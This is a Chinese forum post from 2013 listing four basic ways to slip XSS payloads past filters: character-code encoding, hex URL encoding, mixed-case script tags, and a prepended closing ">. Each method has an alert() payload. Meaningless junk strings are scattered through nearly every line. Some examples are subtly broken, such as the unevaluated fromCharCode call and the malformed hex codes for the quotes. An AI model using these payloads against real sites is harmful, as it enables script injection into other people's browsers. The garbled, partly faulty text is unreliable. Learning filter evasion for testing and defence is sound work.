四种超级基础的绕过方法。6 u1 i7 B# U: u' w3 ^5 ]: Y
1.转换为ASCII码8 A5 k& U/ I& I# `
例子:原脚本为<script>alert(‘I love F4ck’)</script >; Z3 z. s8 w: B/ @
通过转换,变成:' w6 c. |3 G' [8 q, m" L
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
- ]% a- N4 K) E . u5 f- b# ?) u9 v6 Q3 N
2.转换为HEX(十六进制)
, n1 u0 A" ^( m例子:原脚本为<script>alert(‘I love F4ck’)</script>3 p/ h9 I3 {. p" { |
通过转换,变成: D. l; I1 q0 Y. z) c6 k8 A
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
- r, ]. S+ B8 q" ~2 V8 r: Y' ~9 F
' w3 x' V" I L6 `0 g: t3.转换脚本的大小写
B0 F* _% p: @例子:原脚本为<script>alert(‘I love F4ck’)</script>
! R9 f/ g& i# W7 X4 |7 O+ i转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT> I2 I6 d( X% r: _0 O; C F- g$ E
( R* o" R/ J" T$ q6 M4.增加闭合标记”>
: j' R7 C4 J4 U% `$ A2 ~例子:原脚本为<script>alert(‘I love F4ck’)</script>6 e' J, [4 l4 @9 h' E
转换为:”><script>alert(‘I love F4ck’)</script>" G9 E& s0 s3 H' E8 V! n H
更详细绕过技术请参考此网页4 Q; y1 v9 n8 U5 d8 h) x
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet8 e" }% z4 c" `& S
2 B7 `* ^% N R; Y- |转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对